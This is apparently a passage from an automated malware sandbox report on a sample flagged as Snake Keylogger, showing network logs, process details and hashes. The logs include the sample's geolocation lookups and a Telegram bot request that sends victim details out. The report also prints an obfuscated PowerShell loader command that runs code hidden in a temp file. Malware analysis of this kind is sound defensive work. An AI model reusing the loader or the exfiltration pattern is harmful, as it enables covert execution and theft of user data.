2025-01-10 23:41:19 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49931	104.21.80.1	443	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:41:20 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 23:41:20 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:20 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1867269 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wqR7iS8TVoK5Upbc%2BZkvo67MGx8AkZWQzJ6FoRULSNQRV9%2FXoZN6V8%2BAHqO6a8mK4PrCaM3QWaSK9E3hiESqznbKEE%2FxbicTrh28vjTJDr3wYIxP0z3Eeqo9Sv%2B2OTXPR4hhfGzE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000846bd8427d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2010&rtt_var=757&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1443400&cwnd=244&unsent_bytes=0&cid=9fcd96128474ef84&ts=160&x=0"
2025-01-10 23:41:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49943	104.21.80.1	443	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:41:21 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 23:41:21 UTC	851	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:21 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1867271 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6N9FVCppExYyvMhzuhG4FgZjxWEYA7PaKRHXTsUlPRSyQralnZ1B2dmFqBrYiJg9pyZnedP6EDSLCZIWZl3oCxVVXUE%2FWeD5UCrBRPaKZmpvI1CiXFBBqW90GLVaT29xfnftWzz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90008473ddbbc443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1636&rtt_var=643&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1664766&cwnd=244&unsent_bytes=0&cid=5314cae19f923634&ts=147&x=0"
2025-01-10 23:41:21 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49954	104.21.80.1	443	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:41:23 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 23:41:23 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1867272 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pVtZkLvZSrG8ptTPwaXoOWYIH2Eyzpk2KcU7UsaT2z%2Bx62BExEOsTASoj9gsUVfxg8pvtsHUTtRzUfY5yHJT1%2Bcm8x2FXJtEgPDesLwlrHS2HUuBwSc8oDCjmuAdS5eNjs7pWc%2Fz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000847c1bb68c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1936&rtt_var=768&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1508264&cwnd=223&unsent_bytes=0&cid=6befbbbbfb077b55&ts=157&x=0"
2025-01-10 23:41:23 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49963	104.21.80.1	443	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:41:24 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 23:41:24 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:24 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1867273 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q230yz2XQ%2BLLPO1azW6L32lGjy1uFgtbNoa3Y4cRh8au1%2B6nI9os%2F44VJd8OXhL9dgCsPk%2FfXib1Fagg0f3bBgsga4HAofRXCIWeNHqHycYCEg1hh3RN1AdBXZAlAuuXQDKYzBmL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90008484bef443ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1706&rtt_var=651&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1664766&cwnd=228&unsent_bytes=0&cid=c12c5a8d82f80d66&ts=188&x=0"
2025-01-10 23:41:24 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49974	104.21.80.1	443	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:41:25 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 23:41:25 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1867275 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=04Pas3g8e%2F0AGM%2FW0GCvwDkqjtLROYqOhnaUMaU1G%2Bvus6URgIQCMDdIVJTHrpCL9kNIy%2BQ%2BnOmRgDEOOETTBqgTnJUfq5pOCsObAN75KpqEcZR9dGufI2TqDN1ETXRIyH4c78B1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000848d2b210f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1473&min_rtt=1464&rtt_var=567&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1899804&cwnd=231&unsent_bytes=0&cid=5ff29862b7ad2da9&ts=144&x=0"
2025-01-10 23:41:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49982	104.21.80.1	443	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:41:27 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 23:41:27 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1867276 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V1KCWH8XyZt31qzaaBxy4wB9JTlLwRh%2Bg1IXF1XWomwX%2BJ0ix0K7LO9RAqMtJSaKi%2F5ddHi8Yb44tbVke00LxS0pU00CDRgSU5FbzAEGR87x4AlG4cqNVPyJzPEPCbvFv%2F0uYf7L"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900084955bf643ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1727&rtt_var=664&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1626740&cwnd=228&unsent_bytes=0&cid=5a263f13a77a4839&ts=138&x=0"
2025-01-10 23:41:27 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49984	104.21.80.1	443	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:41:28 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 23:41:28 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:28 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1867277 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fRk4hzy6%2BtgHEEZwMGJ5OLTvq8Q9SnbmUhAc4c7eyIHzG7ymYMw0SFt3slDPtaCDUxXWB9gc7UwvgN%2BjmOk%2Bb%2FWSQEtUnzwQfemKurcWN7jUNQXwqsaA9jhcaqLq6Dn3eiQSBx3M"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000849dae2043ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1711&rtt_var=643&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1698662&cwnd=228&unsent_bytes=0&cid=90ac68da05917d09&ts=170&x=0"
2025-01-10 23:41:28 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49986	104.21.80.1	443	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:41:29 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 23:41:30 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1867279 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nUujR93XsmwrgMT7yQCjuVS1EkVTtsGdU6NSbLmtmXULDMCQQiqVzOsteR5oIWterrsiqNe0Juw6SyJ%2FI78sdAV%2BdNUjkjj0C8H0ViRNAlyEiF%2BQfa9tCY1G%2Fv%2BGasjB9APWqTRC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900084a64df542d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1567&rtt_var=596&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1825000&cwnd=229&unsent_bytes=0&cid=0d5c48a01d6290d0&ts=152&x=0"
2025-01-10 23:41:30 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49987	149.154.167.220	443	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:41:30 UTC	345	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2011/01/2025%20/%2006:06:33%0D%0ACountry%20Name:%20United%20States%0D%0A[%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-10 23:41:30 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 23:41:30 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 23:41:30 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	18:40:39
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\TjoY7n65om.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TjoY7n65om.exe"
Imagebase:	0x400000
File size:	825'542 bytes
MD5 hash:	6A5B8C6057DFF681139FD609FFC6B21D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:40:46
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)"
Imagebase:	0xbf0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:40:46
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:41:09
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\Temp\Bivejens.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Bivejens.exe"
Imagebase:	0x400000
File size:	825'542 bytes
MD5 hash:	6A5B8C6057DFF681139FD609FFC6B21D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 50%, ReversingLabs Detection: 65%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	22.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.3%
Total number of Nodes:	1327
Total number of Limit Nodes:	35

Executed Functions

Function 00403359 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040337C
GetVersion.KERNEL32 ref: 00403382
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
